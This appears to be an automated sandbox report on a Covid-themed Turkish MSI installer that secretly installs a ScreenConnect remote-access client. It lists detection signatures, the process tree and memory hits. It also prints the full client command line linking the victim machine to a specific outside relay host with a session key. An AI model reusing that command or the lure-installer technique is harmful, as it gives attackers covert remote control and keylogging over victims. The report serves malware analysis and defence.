Analysis Report Covid 19 bilgi y#U00f6netim sistemi.msi

Overview

General Information

Sample Name: Covid 19 bilgi y#U00f6netim sistemi.msi
Analysis ID: 355327
MD5: 1f365aa75ff0d2806a2269d238208593
SHA1: 440ef2dfdd778ec159cd6babc60e2b70252d661f
SHA256: 3dbe3682f5d3db8cd0d8c0586d3c345a458f274355a4dac2edd05f25092423a8

Detection

ScreenConnect Tool
Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

.NET source code references suspicious native API functions
Binary contains a suspicious time stamp
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to log keystrokes (.Net Source)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
AV process strings found (often used to terminate AV products)
Checks for available system drives (often done to infect USB drives)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Startup

  • System is w10x64
  • msiexec.exe (PID: 5888 cmdline: 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi' MD5: 4767B71A318E201188A0D0A420C8B608)
  • msiexec.exe (PID: 1020 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • rundll32.exe (PID: 6016 cmdline: rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • msiexec.exe (PID: 4812 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • msiexec.exe (PID: 5456 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • ScreenConnect.ClientService.exe (PID: 5304 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c=' MD5: F4AFEF1043565F8967F5E8F57B3EEE13)
    • ScreenConnect.WindowsClient.exe (PID: 4316 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User' MD5: 72D9361CA129593F1F953D42EBD77122)
    • ScreenConnect.WindowsClient.exe (PID: 5072 cmdline: 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System' MD5: 72D9361CA129593F1F953D42EBD77122)
  • svchost.exe (PID: 5560 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5600 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 4760 cmdline: c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5840 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1968 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3440 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 4084 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1332 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 5604 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 3484 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5788 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000002.471825192.0000000004112000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000007.00000000.212668661.00000000005B2000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000006.00000002.457186960.0000000000CF2000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000000.00000003.203704441.00000269DBA8D000.00000004.00000001.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
00000006.00000000.204518995.0000000000CF2000.00000002.00020000.sdmp | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.ScreenConnect.WindowsClient.exe.5b0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
7.0.ScreenConnect.WindowsClient.exe.5b0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
5.2.ScreenConnect.ClientService.exe.4110000.10.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |
6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack | JoeSecurity_ScreenConnectTool | Yara detected ScreenConnect Tool | Joe Security |

Sigma Overview

No Sigma rule has matched

Signature Overview

Compliance:

Binary contains paths to debug symbols
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
Source: unknown DNS traffic detected: queries for: instance-s6p2r4-relay.screenconnect.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      Contains functionality to log keystrokes (.Net Source)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/LowLevelKeyboardHooker.cs.Net Code: .ctor
                      Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Windows\Installer\wix{460549FD-A8A1-4DCF-B47F-E1FFE52A8670}.SchedServiceConfig.rmiJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_3_04B504402_3_04B50440
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3239D5_2_00E3239D
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E378B45_2_00E378B4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3B07C5_2_00E3B07C
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E390325_2_00E39032
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E3A8115_2_00E3A811
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E395A45_2_00E395A4
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E38AC05_2_00E38AC0
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F176_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95D656_2_00007FFAEEF95D65
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F836_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF90F926_2_00007FFAEEF90F92
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0A836_2_00007FFAEEFA0A83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA09A36_2_00007FFAEEFA09A3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF960517_2_00007FFAEEF96051
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F177_2_00007FFAEEF90F17
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F837_2_00007FFAEEF90F83
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF90F927_2_00007FFAEEF90F92
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll4 vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenameSfxCA.dllL vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiBinary or memory string: OriginalFilenamewixca.dll\ vs Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: 5.2.ScreenConnect.ClientService.exe.38b0000.5.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.30b0000.3.unpack, ScreenConnect/BlockBufferStream.csCryptographic APIs: 'TransformBlock'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsToolkit.csCryptographic APIs: 'CreateDecryptor'
                      Source: 6.2.ScreenConnect.WindowsClient.exe.1bdf0000.4.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.2.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 5.2.ScreenConnect.ClientService.exe.4110000.10.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.IO.Directory::SetAccessControl(System.String,System.Security.AccessControl.DirectorySecurity)
                      Source: 6.0.ScreenConnect.WindowsClient.exe.cf0000.0.unpack, ScreenConnect/Program.csSecurity API names: System.Void System.Security.AccessControl.FileSystemSecurity::AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                      Source: 5.2.ScreenConnect.ClientService.exe.3ae0000.6.unpack, ScreenConnect/WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
                      Source: classification engineClassification label: mal60.spyw.evad.winMSI@24/15@2/3
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31880 StartServiceCtrlDispatcherW,VariantInit,OpenSCManagerW,OpenServiceW,GetCommandLineW,CreateServiceW,RegOpenKeyW,RegOpenKeyW,RegOpenKeyW,RegCreateKeyW,RegSetValueExW,QueryServiceStatus,QueryServiceStatus,StartServiceW,QueryServiceStatus,Sleep,QueryServiceStatus,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,VariantClear,VariantClear,5_2_00E31880
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.logJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2476:120:WilError_01
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIDAF2.tmpJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: GetServiceName5_2_00E31880
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCommand line argument: Service5_2_00E31880
                      Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - Root\CIMV2 : select * from Win32_Processor
                      Source: C:\Windows\System32\msiexec.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hosts
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: TRID: Microsoft Windows Installer (77509/1) 63.77%
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Covid 19 bilgi y#U00f6netim sistemi.msi'
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 310E53CA954B87DDF133BB769ED24F52 C
                      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4286051B5CAEA5BC438DE69C35768ED1
                      Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 6600E2C3A2980F238FD9D94A5368BBD9 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-s6p2r4-relay.screenconnect.com&p=443&s=b49f7b4e-1f8e-4869-a774-7ac73425b6f9&k=BgIAAACkAABSU0ExAAgAAAEAAQAlGYhEPkxKLjcbpwfNZ%2bHR%2fKlTyh8C1eZxhmDq%2baJwQu0VExdNkYfU8P8vD7Y1ZlciHJizNXwnloBDvG1WWJc%2fIrWfX92vykYxqBgUI%2b4K3nOFaRgz3P4iujIXLKmSFuso0Nz%2f9QKAIGQ2FXaFykfYO2dzQQT3wK3Tf0snCYB0oDbSx4YwykdQiz5RcNZfnRkEpx9V%2fjHA1Ojf4Qy2Jy%2beBkU7baqCnkSPedSlHYXKd5Ntlcetv0j6hyn1m4yl%2fFPTTzSAOHcH9OFurBD8INMgbxBWfXp2iwBLbUhbM%2fwW8uAnf93bOrruAeNwCTfZiqQKKfPT0Gmm24qAeUeFxKjR&t=&c=gazete&c=gov.tr&c=tr&c=pc&c=&c=&c=&c='
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIDAF2.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6479046 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArgumentsJump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '801dc3ab-dc2c-422e-ad1c-65e2ce12fcf0' 'User'Jump to behavior
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exe' 'RunRole' '68e7f305-6be0-44b6-9ef1-df08711f43e1' 'System'Jump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\System32\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: Covid 19 bilgi y#U00f6netim sistemi.msiStatic file information: File size 1892352 > 1048576
                      Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000005.00000002.461665462.0000000000E3E000.00000002.00020000.sdmp
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbT source: Microsoft.Deployment.WindowsInstaller.dll.2.dr
                      Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi
                      Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Covid 19 bilgi y#U00f6netim sistemi.msi

                      Data Obfuscation:

                      Binary contains a suspicious time stamp
                      Source: initial sampleStatic PE information: 0xCD682783 [Thu Mar 16 01:18:59 2079 UTC]
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E31160 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx,SysAllocString,SysFreeString,GetModuleHandleW,GetModuleFileNameW,PathRemoveExtensionW,PathFindFileNameW,StrCpyW,StrCpyW,StrCpyW,SafeArrayCreateVector,VariantClear,VariantClear,SysAllocString,SafeArrayPutElement,VariantClear,VariantInit,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,SysAllocString,SysFreeString,VariantClear,VariantClear,5_2_00E31160
                      Source: MSIDAF2.tmp.0.drStatic PE information: real checksum: 0x2f213 should be: 0x66bd6
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_00E326D5 push ecx; ret 5_2_00E326E8
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.ClientService.exeCode function: 5_2_041139A7 push es; retn 0006h5_2_04113AFF
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEFA0768 push es; retn 6002h6_2_00007FFAEEFDBDC5
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh6_2_00007FFAEEF9801A
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF979DE push eax; retf 6_2_00007FFAEEF979ED
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 6_2_00007FFAEEF97935 pushad ; retf 6_2_00007FFAEEF979DD
                      Source: C:\Program Files (x86)\ScreenConnect Client (5c1b63d437ba59e3)\ScreenConnect.WindowsClient.exeCode function: 7_2_00007FFAEEF95DE8 push ebx; retn 5F5Eh7_2_00007FFAEEF9801A
